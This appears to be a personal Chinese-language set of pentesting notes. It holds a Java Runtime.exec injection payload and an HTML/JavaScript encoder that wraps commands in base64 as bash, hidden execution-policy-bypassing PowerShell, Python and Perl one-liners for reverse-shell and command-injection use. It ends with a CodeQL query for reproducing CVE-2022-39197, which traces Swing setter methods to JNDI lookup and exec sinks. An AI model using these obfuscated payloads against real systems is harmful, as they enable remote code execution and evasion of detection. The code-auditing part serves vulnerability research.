一些杂七杂八提醒自己的东西
反弹shell
@java.lang.Runtime@getRuntime().exec(‘id’)
base64编码工具
<!DOCTYPE html>
<html>
<head>
<title>java runtime exec usage...</title>
</head>
<body>
<p>Input type:
<input type="radio" id="bash" name="option" value="bash" onclick="processInput();" checked=""><label for="bash">Bash</label>
<input type="radio" id="powershell" name="option" value="powershell" onclick="processInput();"><label for="powershell">PowerShell</label>
<input type="radio" id="python" name="option" value="python" onclick="processInput();"><label for="python">Python</label>
<input type="radio" id="perl" name="option" value="perl" onclick="processInput();"><label for="perl">Perl</label></p>
<p><textarea rows="10" style="width: 100%; box-sizing: border-box;" id="input" placeholder="Type Bash here..."></textarea>
<textarea rows="5" style="width: 100%; box-sizing: border-box;" id="output" onclick="this.focus(); this.select();" readonly=""></textarea></p>
<script>
var taInput = document.querySelector('textarea#input');
var taOutput = document.querySelector('textarea#output');
function processInput() {
var option = document.querySelector('input[name="option"]:checked').value;
switch (option) {
case 'bash':
taInput.placeholder = 'Type Bash here...'
taOutput.value = 'bash -c {echo,' + btoa(taInput.value) + '}|{base64,-d}|{bash,-i}';
break;
case 'powershell':
taInput.placeholder = 'Type PowerShell here...'
poshInput = ''
for (var i = 0; i < taInput.value.length; i++) { poshInput += taInput.value[i] + unescape("%00"); }
taOutput.value = 'powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc ' + btoa(poshInput);
break;
case 'python':
taInput.placeholder = 'Type Python here...'
taOutput.value = "python -c exec('" + btoa(taInput.value) + "'.decode('base64'))";
break;
case 'perl':
taInput.placeholder = 'Type Perl here...'
taOutput.value = "perl -MMIME::Base64 -e eval(decode_base64('" + btoa(taInput.value) + "'))";
break;
default:
taOutput.value = ''
}
if (!taInput.value) taOutput.value = '';
}
taInput.addEventListener('input', processInput, false);
</script>
</body>
</html>
Shell、命令等,上传到java的时候,base64编码一下
web攻击
一些注入攻击,bp该包等攻击,注意url编码一下
代码审计的时候,可以用codeQL,用来查找漏洞函数
代码审计的时候,因为代码太多了,函数也太多了,就可以用codeQL来找一些符合条件的函数。
应用场景:你需要找一个函数,他传入的参数是String类型,而且返回的值也是String类型,还有就是函数名字是setXxx这样的
cs rce CVE-2022-39197 漏洞复现
CS_XSS.ql
/**
* @kind path-problem
*/
import java
//查找source的类到恶意类的通路
//source有xxx属性、有setXXX方法且有一个String参数、instanceof Component
class XXXSetMethod extends Method{
XXXSetMethod(){
this.getName().indexOf("set") = 0 and
this.getName().length() > 3 and
this.getNumberOfParameters() = 1 and
this.getAParamType().hasName("String") and
this.getDeclaringType().getASupertype*().hasQualifiedName("java.awt", "Component")
}
}
class JNDIMethod extends Method{
JNDIMethod(){
this.getDeclaringType().getAnAncestor().hasQualifiedName("javax.naming", "Context") and
this.hasName("lookup")
}
}
class InvokeMethod extends Method {
InvokeMethod() {
this.hasName("invoke")
}
}
class NewInstanceMethod extends Method {
NewInstanceMethod() {
exists(RefType type, Method m|
this.getACallee() = m and
m.hasName("newInstance") and
m.getDeclaringType*().getErasure() = type
)
}
}
class CommandInjectMethod extends Method {
CommandInjectMethod() {
this.getACallee() instanceof ExecCallable
}
}
class RuntimeMethod extends Method {
RuntimeMethod() {
this.getDeclaringType().hasQualifiedName("java.lang", "Runtime") and
this.hasName("exec")
}
}
class TargetMethod extends Method {
TargetMethod() {
this instanceof JNDIMethod or
// this instanceof InvokeMethod or
// this instanceof NewInstanceMethod or
this instanceof CommandInjectMethod or
this instanceof MethodRuntimeExec or
this instanceof MethodProcessBuilderCommand
}
}
query predicate edges(Method a, Method b) { a.polyCalls(b) }
from XXXSetMethod entryPoint, TargetMethod end
where edges*(entryPoint, end)
select entryPoint, entryPoint, end, "Found a path from start to target."
